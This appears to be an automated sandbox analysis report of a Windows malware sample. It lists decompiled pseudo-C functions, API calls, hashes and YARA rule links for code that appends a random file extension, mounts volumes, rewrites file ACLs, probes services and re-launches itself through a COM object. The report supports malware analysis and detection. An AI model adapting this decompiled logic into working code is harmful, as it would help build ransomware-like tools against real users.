                                                                                        • Instruction Fuzzy Hash: 81418270900209EFDB219F94ED49BAEBB75FF04305F208036E501B61E1C77AA95ADF5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040743A, Relevance: 9.1, APIs: 6, Instructions: 104memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040744D
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00407466
                                                                                        • _swprintf.NTDLL ref: 00407478
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 0040748D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407722
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407739
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate_swprintfwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 793461835-0
                                                                                        • Opcode ID: fcb9670295118b63f5052eff47242ec0f74a164052a575d7ab58542269b4ae6f
                                                                                        • Instruction ID: 51fda382e1c4280d7ddda007286011f921d6c84c7e02d989648ca6b3ea8bccd1
                                                                                        • Opcode Fuzzy Hash: fcb9670295118b63f5052eff47242ec0f74a164052a575d7ab58542269b4ae6f
                                                                                        • Instruction Fuzzy Hash: 81418270900209EFDB219F94ED49BAEBB75FF04305F208036E501B61E1C77AA95ADF5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403BB0, Relevance: 9.1, APIs: 6, Instructions: 104memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 18%
                                                                                        			E00403BB0(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;

				_v8 = 0;
				_v24 = 0;
				_v28 = 0;
				 *0x40f888(0);
				_v12 = E00401D08(0x40e74e);
				_v16 = E00401D08(0x40e762);
				_v20 = E00401D08(0x40e776);
				_push( &_v24);
				_push(_v16);
				_push(1);
				_push(0);
				_push(_v12);
				if( *0x40f898() == 0) {
					_push( &_v28);
					_push(_v20);
					_push(_v24);
					if( *((intOrPtr*)( *_v24))() == 0) {
						_push(0);
						_push(_a4);
						_push(_v28);
						if( *((intOrPtr*)( *_v28 + 0x14))() == 0) {
							_v8 = RtlAllocateHeap( *0x40f5d6, 8, 0x8000);
							if(_v8 != 0) {
								_push(0);
								_push(0);
								_push(0x4000);
								_push(_v8);
								_push(_v24);
								if( *((intOrPtr*)( *_v24 + 0xc))() != 0) {
									RtlFreeHeap( *0x40f5d6, 0, _v8);
									_v8 = 0;
								}
							}
						}
					}
				}
				RtlFreeHeap( *0x40f5d6, 0, _v12);
				RtlFreeHeap( *0x40f5d6, 0, _v16);
				RtlFreeHeap( *0x40f5d6, 0, _v20);
				if(_v28 != 0) {
					 *((intOrPtr*)( *_v28 + 8))(_v28);
				}
				if(_v24 != 0) {
					 *((intOrPtr*)( *_v24 + 8))(_v24);
				}
				 *0x40f88c();
				return _v8;
			}









                                                                                        0x00403bbb
                                                                                        0x00403bc2
                                                                                        0x00403bc9
                                                                                        0x00403bd2
                                                                                        0x00403be2
                                                                                        0x00403bef
                                                                                        0x00403bfc
                                                                                        0x00403c02
                                                                                        0x00403c03
                                                                                        0x00403c06
                                                                                        0x00403c08
                                                                                        0x00403c0a
                                                                                        0x00403c15
                                                                                        0x00403c1f
                                                                                        0x00403c20
                                                                                        0x00403c23
                                                                                        0x00403c2a
                                                                                        0x00403c31
                                                                                        0x00403c33
                                                                                        0x00403c36
                                                                                        0x00403c3e
                                                                                        0x00403c53
                                                                                        0x00403c5a
                                                                                        0x00403c61
                                                                                        0x00403c63
                                                                                        0x00403c65
                                                                                        0x00403c6a
                                                                                        0x00403c6d
                                                                                        0x00403c75
                                                                                        0x00403c82
                                                                                        0x00403c88
                                                                                        0x00403c88
                                                                                        0x00403c75
                                                                                        0x00403c5a
                                                                                        0x00403c3e
                                                                                        0x00403c2a
                                                                                        0x00403c9a
                                                                                        0x00403cab
                                                                                        0x00403cbc
                                                                                        0x00403cc6
                                                                                        0x00403cd0
                                                                                        0x00403cd0
                                                                                        0x00403cd7
                                                                                        0x00403ce1
                                                                                        0x00403ce1
                                                                                        0x00403ce4
                                                                                        0x00403cf5

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00403BD2
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00008000), ref: 00403C4D
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403C82
                                                                                        • RtlFreeHeap.NTDLL(00000000,00408D46), ref: 00403C9A
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00403CAB
                                                                                        • RtlFreeHeap.NTDLL(00000000,?), ref: 00403CBC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$Allocate$Initialize
                                                                                        • String ID:
                                                                                        • API String ID: 1640397549-0
                                                                                        • Opcode ID: d4a1f2a4fc3cc9aa9fa2fabc02db46a3f971e8063bc2164fc8c46c92e2efe1df
                                                                                        • Instruction ID: e3dadd8eb797c7b19ebca9e0442eb91f9782e03a6c7c290a79183afb30ae0f31
                                                                                        • Opcode Fuzzy Hash: d4a1f2a4fc3cc9aa9fa2fabc02db46a3f971e8063bc2164fc8c46c92e2efe1df
                                                                                        • Instruction Fuzzy Hash: D141E771A00209FFEB219F90DD4ABAEBB75FF04701F204179E600B62A0D7756A55DB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406B24, Relevance: 9.1, APIs: 6, Instructions: 62memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 55%
                                                                                        			E00406B24(intOrPtr _a4) {
				void* _v8;
				char _v28;
				void* _t20;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t26 =  &_v28;
				 *_t26 = 0x3a0043;
				 *((intOrPtr*)(_t26 + 4)) = 0x25005c;
				 *((intOrPtr*)(_t26 + 8)) = 0x250075;
				 *((intOrPtr*)(_t26 + 0xc)) = 0x5c0075;
				 *(_t26 + 0x10) = 0;
				_v8 = 0;
				_v8 = RtlAllocateHeap( *0x40f5d6, 8, 0x80);
				if(_v8 == 0) {
					L7:
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t20 = E004049F9();
					 *0x40f69c(_v8, _t26, _t20, _t27);
					_t28 = _t28 + 0x10;
					if(CreateDirectoryW(_v8, 0) != 0) {
						break;
					}
					if( *[fs:0x34] != 0xb7) {
						RtlFreeHeap( *0x40f5d6, 0, _v8);
						_v8 = 0;
						goto L7;
					}
				}
				_push(_a4);
				_push(_v8);
				if( *0x40f7c0() == 0) {
					RtlFreeHeap( *0x40f5d6, 0, _v8);
					_v8 = 0;
				}
				goto L7;
			}









                                                                                        0x00406b2f
                                                                                        0x00406b32
                                                                                        0x00406b38
                                                                                        0x00406b3f
                                                                                        0x00406b46
                                                                                        0x00406b4d
                                                                                        0x00406b54
                                                                                        0x00406b6e
                                                                                        0x00406b75
                                                                                        0x00406beb
                                                                                        0x00406bf6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406b77
                                                                                        0x00406b77
                                                                                        0x00406b77
                                                                                        0x00406b82
                                                                                        0x00406b88
                                                                                        0x00406b98
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406ba5
                                                                                        0x00406bb4
                                                                                        0x00406bba
                                                                                        0x00000000
                                                                                        0x00406bba
                                                                                        0x00406ba7
                                                                                        0x00406bc3
                                                                                        0x00406bc6
                                                                                        0x00406bd1
                                                                                        0x00406bde
                                                                                        0x00406be4
                                                                                        0x00406be4
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000080), ref: 00406B68
                                                                                          • Part of subcall function 004049F9: GetTickCount.KERNEL32 ref: 00404A06
                                                                                          • Part of subcall function 004049F9: RtlRandom.NTDLL(0040F964), ref: 00404A16
                                                                                        • _swprintf.NTDLL ref: 00406B82
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00406B90
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00406BB4
                                                                                        • SetVolumeMountPointW.KERNEL32(00000000,00000000), ref: 00406BC9
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00406BDE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateCountCreateDirectoryMountPointRandomTickVolume_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 101820272-0
                                                                                        • Opcode ID: 3cfb989db7807931fd826e3ed054d8a834d0ab16829a180cc7a3390b2ead4d46
                                                                                        • Instruction ID: e1b37034f326fe4f70f2fee52cf03571b882bad2b00ff06de1ec0b57b8cf0b62
                                                                                        • Opcode Fuzzy Hash: 3cfb989db7807931fd826e3ed054d8a834d0ab16829a180cc7a3390b2ead4d46
                                                                                        • Instruction Fuzzy Hash: 0E218EB1501208FFDB209F50DE49F9E7B74FB00715F108079E505BA1A0D7766A28EB58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040611D, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _allshr.NTDLL ref: 00406124
                                                                                        • _allshr.NTDLL ref: 00406232
                                                                                        • _alldiv.NTDLL(00000000,?,00000000), ref: 00406244
                                                                                        • _allmul.NTDLL(00000000,?,00200000,00000000), ref: 00406253
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: _allshr$_alldiv_allmul
                                                                                        • String ID:
                                                                                        • API String ID: 2318519744-0
                                                                                        • Opcode ID: ec3250a0b4dcfe5d13b4ee3031842530c6dc9307823f78fb5891440a3bac61f5
                                                                                        • Instruction ID: ed964a510cdfc7cd5c8e69f14ecb066afd3b3f1ebec39e60c687e42bb41a05ce
                                                                                        • Opcode Fuzzy Hash: ec3250a0b4dcfe5d13b4ee3031842530c6dc9307823f78fb5891440a3bac61f5
                                                                                        • Instruction Fuzzy Hash: DA212121E460A0DAF734310899687BBA116D782751F1B407F9E9B7A2C9CE3C0DF2119F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402581, Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 40%
                                                                                        			E00402581() {
				int _v8;
				long _v12;
				void* _t15;
				void* _t26;
				wchar_t* _t31;
				wchar_t* _t32;

				_v12 = 0;
				_t15 =  *0x40f888(0);
				if(_t15 == 0x54f) {
					return _t15;
				}
				E00402367();
				E004024C1( &_v12);
				if(_v12 != 0) {
					_t31 =  *0x40f5e2; // 0x7a0fe0
					_t26 = CommandLineToArgvW(_t31,  &_v8);
					if(_v8 != 1) {
						_t32 = wcsstr(_t31,  *(_t26 + 4));
						if( *((short*)(_t32 - 2)) != 0x20) {
							_t32 = _t32 - 2;
						}
					} else {
						_t32 = 0;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(_t32);
					_push( *_t26);
					_push(_v12);
					if( *((intOrPtr*)( *_v12 + 0x24))() == 0) {
						 *((intOrPtr*)( *_v12 + 8))(_v12);
					}
					RtlFreeHeap( *0x40f5d6, 0, _t26);
				}
				return  *0x40f88c();
			}









                                                                                        0x00402587
                                                                                        0x00402590
                                                                                        0x0040259b
                                                                                        0x00402626
                                                                                        0x00402626
                                                                                        0x004025a1
                                                                                        0x004025aa
                                                                                        0x004025b3
                                                                                        0x004025b5
                                                                                        0x004025c6
                                                                                        0x004025cc
                                                                                        0x004025df
                                                                                        0x004025e6
                                                                                        0x004025e8
                                                                                        0x004025e8
                                                                                        0x004025ce
                                                                                        0x004025ce
                                                                                        0x004025ce
                                                                                        0x004025f0
                                                                                        0x004025f2
                                                                                        0x004025f4
                                                                                        0x004025f6
                                                                                        0x004025f7
                                                                                        0x004025f9
                                                                                        0x00402601
                                                                                        0x0040260b
                                                                                        0x0040260b
                                                                                        0x00402617
                                                                                        0x00402617
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00402590
                                                                                          • Part of subcall function 00402367: NtAllocateVirtualMemory.NTDLL(000000FF,0040F958,00000000,00001000,00003000,00000004), ref: 0040238D
                                                                                          • Part of subcall function 00402367: NtAllocateVirtualMemory.NTDLL(000000FF,0040F954,00000000,00001000,00003000,00000004), ref: 004023B4
                                                                                          • Part of subcall function 00402367: NtAllocateVirtualMemory.NTDLL(000000FF,0040F950,00000000,00001000,00003000,00000004), ref: 004023DB
                                                                                          • Part of subcall function 00402367: wcscpy.NTDLL ref: 0040241F
                                                                                          • Part of subcall function 00402367: wcscat.NTDLL ref: 0040242F
                                                                                          • Part of subcall function 00402367: wcslen.NTDLL ref: 0040244B
                                                                                          • Part of subcall function 00402367: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402468
                                                                                          • Part of subcall function 00402367: RtlEnterCriticalSection.NTDLL(?), ref: 00402478
                                                                                          • Part of subcall function 00402367: RtlInitUnicodeString.NTDLL(?), ref: 0040248B
                                                                                          • Part of subcall function 00402367: RtlInitUnicodeString.NTDLL(?), ref: 0040249B
                                                                                          • Part of subcall function 00402367: RtlLeaveCriticalSection.NTDLL(?), ref: 004024A4
                                                                                          • Part of subcall function 00402367: LdrEnumerateLoadedModules.NTDLL(00000000,00402322,00000030), ref: 004024B2
                                                                                          • Part of subcall function 004024C1: wcscpy.NTDLL ref: 004024EF
                                                                                          • Part of subcall function 004024C1: wcscat.NTDLL ref: 00402500
                                                                                          • Part of subcall function 004024C1: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402512
                                                                                          • Part of subcall function 004024C1: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402521
                                                                                          • Part of subcall function 004024C1: memset.NTDLL ref: 0040252F
                                                                                          • Part of subcall function 004024C1: CoGetObject.OLE32(?,00000024,00000000,004025AF), ref: 00402561
                                                                                          • Part of subcall function 004024C1: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402570
                                                                                        • CommandLineToArgvW.SHELL32(007A0FE0,004091CD,00000000), ref: 004025C0
                                                                                        • wcsstr.NTDLL ref: 004025D6
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00402617
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$AllocateMemoryVirtual$CriticalInitSectionStringUnicodewcscatwcscpy$ArgvCommandEnterEnumerateInitializeLeaveLineLoadedModulesObjectmemsetwcslenwcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 2547784891-0
                                                                                        • Opcode ID: 49af22b765b8dde071d2fe5f232c9e19b86c4df1cc8ca3774b9d669a325484af
                                                                                        • Instruction ID: b770824f50c8b5cf821802ec8e57688202c9176f77eb22839bfd43197702f1f3
                                                                                        • Opcode Fuzzy Hash: 49af22b765b8dde071d2fe5f232c9e19b86c4df1cc8ca3774b9d669a325484af
                                                                                        • Instruction Fuzzy Hash: FC118F31900114BBDB20AFA0CE4DB8EBB78FF08305F5045B1E905B72E1D7B59A95CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405DC0, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000004,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000003), ref: 00405DDE
                                                                                        • SetEntriesInAclW.ADVAPI32(00000001,00405D91,00000000,00406716,?,?,?,00000003), ref: 00405DF6
                                                                                        • SetNamedSecurityInfoW.ADVAPI32(00406716,00000001,00000005,00405D85,00000000,00406716,00000000,?,?,?,00000003), ref: 00405E13
                                                                                        • RtlFreeHeap.NTDLL(00000000,00406716), ref: 00405E24
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InfoNamedSecurity$EntriesFreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 2009802112-0
                                                                                        • Opcode ID: e3a6f7b4e6cce42dd5f9f4f0520d365aabef2ef6bd41bc1e1ff1099af3b3ce04
                                                                                        • Instruction ID: f9bdf760a515db76312524bfe0810a1d791a653e98f3678555cf95a32e712cf9
                                                                                        • Opcode Fuzzy Hash: e3a6f7b4e6cce42dd5f9f4f0520d365aabef2ef6bd41bc1e1ff1099af3b3ce04
                                                                                        • Instruction Fuzzy Hash: 60011232380208BAEB304B91ED4AFDB7B79EB44B11F504132B704B94E0E6B25A549A59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004064CC, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 68%
                                                                                        			E004064CC(wchar_t* _a4) {
				long _v8;
				wchar_t* _t10;
				void* _t12;
				signed int _t13;
				WCHAR* _t14;
				wchar_t* _t15;
				void* _t16;
				void* _t17;
				void* _t18;

				_v8 = 0;
				if( *0x40f5b2 != 0) {
					_t10 = wcsrchr(_a4, 0x5c);
					_t17 = _t16 + 8;
					 *_t10 = 0;
					_t14 = PathFindFileNameW(_a4);
					_t15 =  *0x40f5b2; // 0x7bf118
					while(1) {
						_t12 =  *0x40f694(_t15, _t14);
						_t18 = _t17 + 8;
						if(_t12 == 0) {
							break;
						}
						_t13 = wcslen(_t15);
						_t17 = _t18 + 4;
						_t15 = _t15 + 2 + _t13 * 2;
						if( *_t15 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					_v8 = 1;
				}
				L7:
				return _v8;
			}












                                                                                        0x004064d7
                                                                                        0x004064e5
                                                                                        0x004064ec
                                                                                        0x004064f2
                                                                                        0x004064f5
                                                                                        0x00406503
                                                                                        0x00406505
                                                                                        0x0040650b
                                                                                        0x0040650d
                                                                                        0x00406513
                                                                                        0x00406518
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406524
                                                                                        0x0040652a
                                                                                        0x0040652d
                                                                                        0x00406535
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406537
                                                                                        0x00000000
                                                                                        0x00406535
                                                                                        0x0040651a
                                                                                        0x0040651a
                                                                                        0x0040653b
                                                                                        0x00406546

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileFindNamePath_wcsicmpwcslenwcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 847853720-0
                                                                                        • Opcode ID: 8cee9548c1690b2960aba234fffd9ad61559d21186ed3d2da01992f487327397
                                                                                        • Instruction ID: c138e3890ee480235af9747d7f0291219ff55357d9efcbedceb71acd8f38e014
                                                                                        • Opcode Fuzzy Hash: 8cee9548c1690b2960aba234fffd9ad61559d21186ed3d2da01992f487327397
                                                                                        • Instruction Fuzzy Hash: EF018471508214FBE7209F18FD09B9B7BB8EF10311F504036E806B22A0E7765E69C7AE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407F99, Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00407F99() {
				long _v8;
				void* _v12;

				_v12 = 0;
				_v8 = 0;
				GetComputerNameW(_v12,  &_v8);
				_v12 = RtlAllocateHeap( *0x40f5d6, 8, _v8 * 2);
				if(_v12 != 0 && GetComputerNameW(_v12,  &_v8) == 0) {
					RtlFreeHeap( *0x40f5d6, 0, _v12);
					_v12 = 0;
				}
				return _v12;
			}





                                                                                        0x00407fa4
                                                                                        0x00407fab
                                                                                        0x00407fb9
                                                                                        0x00407fd8
                                                                                        0x00407fdf
                                                                                        0x00407ffd
                                                                                        0x00408003
                                                                                        0x00408003
                                                                                        0x00408015

                                                                                        APIs
                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FB9
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407FD2
                                                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00407FE8
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407FFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ComputerHeapName$AllocateFree
                                                                                        • String ID:
                                                                                        • API String ID: 187446995-0
                                                                                        • Opcode ID: a2cb8c2ee7ec572bd830fdc07ab09d059a9f2807e480209936c9b8035d99568f
                                                                                        • Instruction ID: e2d9c646c272d9f1083c3d3729c0fb38b27cbebe2aef510062d823028366a619
                                                                                        • Opcode Fuzzy Hash: a2cb8c2ee7ec572bd830fdc07ab09d059a9f2807e480209936c9b8035d99568f
                                                                                        • Instruction Fuzzy Hash: 2D011A75900208FFEB20CF94ED49BEEBBB8FB44315F1040B9E400B22A0DB721A59DB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402627, Relevance: 6.0, APIs: 4, Instructions: 41serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402627(short* _a4) {
				short* _v8;
				void* _v12;
				void* _v16;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v12 = OpenSCManagerW(0, 0, 0xf003f);
				if(_v12 != 0) {
					_v16 = OpenServiceW(_v12, _a4, 0x80);
					if(_v16 != 0) {
						_v8 = 1;
						CloseServiceHandle(_v16);
					}
				}
				if(_v12 != 0) {
					CloseServiceHandle(_v12);
				}
				return _v8;
			}






                                                                                        0x00402632
                                                                                        0x00402639
                                                                                        0x00402640
                                                                                        0x00402656
                                                                                        0x0040265d
                                                                                        0x00402670
                                                                                        0x00402677
                                                                                        0x00402679
                                                                                        0x00402683
                                                                                        0x00402683
                                                                                        0x00402677
                                                                                        0x0040268d
                                                                                        0x00402692
                                                                                        0x00402692
                                                                                        0x004026a3

                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,00000000), ref: 00402650
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000080,?,?,?,?,00000000), ref: 0040266A
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 00402683
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000), ref: 00402692
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                        • String ID:
                                                                                        • API String ID: 4196757001-0
                                                                                        • Opcode ID: 516d303d4581289e6c23c3fde63d268cadd7820ff18caff3f7c4205bb467e855
                                                                                        • Instruction ID: 0eb3d8930c036626841998c7be16530409ce4aa72f39d474933f9cb5dae4c122
                                                                                        • Opcode Fuzzy Hash: 516d303d4581289e6c23c3fde63d268cadd7820ff18caff3f7c4205bb467e855
                                                                                        • Instruction Fuzzy Hash: 17011A70900208FFEB218F95DD4DBADBBB4EB04315F2081B6E500722E0C7B60A88DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040314C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 58%
                                                                                        			E0040314C(intOrPtr _a4) {
				void* _t5;

				_t5 = E00401D08(0x40cfeb);
				 *0x40f69c(_a4, _t5, ".2c9ccbf3");
				return RtlFreeHeap( *0x40f5d6, 0, _t5);
			}




                                                                                        0x0040315e
                                                                                        0x00403169
                                                                                        0x00403187

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • _swprintf.NTDLL ref: 00403169
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0040317B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
